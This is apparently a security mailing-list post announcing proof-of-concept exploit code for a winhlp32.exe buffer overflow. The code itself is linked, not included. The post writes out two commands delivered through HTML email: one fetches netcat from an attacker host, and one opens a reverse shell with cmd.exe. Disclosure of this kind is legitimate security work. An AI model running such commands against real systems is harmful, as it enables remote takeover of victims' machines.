winhlp32.exe buffer overflow exploit code.

["Gary O'leary-Steele" <garyo () sec-1 com>]

Hello all,


For some reason my previous posts did not make it onto security focus ?-)

The following is a link to proof of concept code /exploit code for this
overflow. The shell code is relatively small but effective if used
correctly. The perl script takes a command to execute (WinExec,SW_HIDE) and
a html output file. There are two versions included in the zip.

Http://www.sec-1.com/help.zip

HelpMe.pl       // Was written to work with my machine Kernel32.dll version
5.0.2195.4272 (Rare ?)

HelpMe2.pl      // Was written to work with all other machines I tested.
kernel32.dll version 5.0.2195.2778


I have tested the exploit using two html emails.

email 1 Executes tftp.exe -i my.ip.address get nc.exe
c:\winnt\system32\nc.exe

email 2         Executes nc.exe my.ip.address 80 -e cmd.exe

If the exploit executes correctly exitprocess()is called so no error occurs.


Kind Regards
Gary O'leary-Steele
XScan Team
www.Sec-1.com




----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/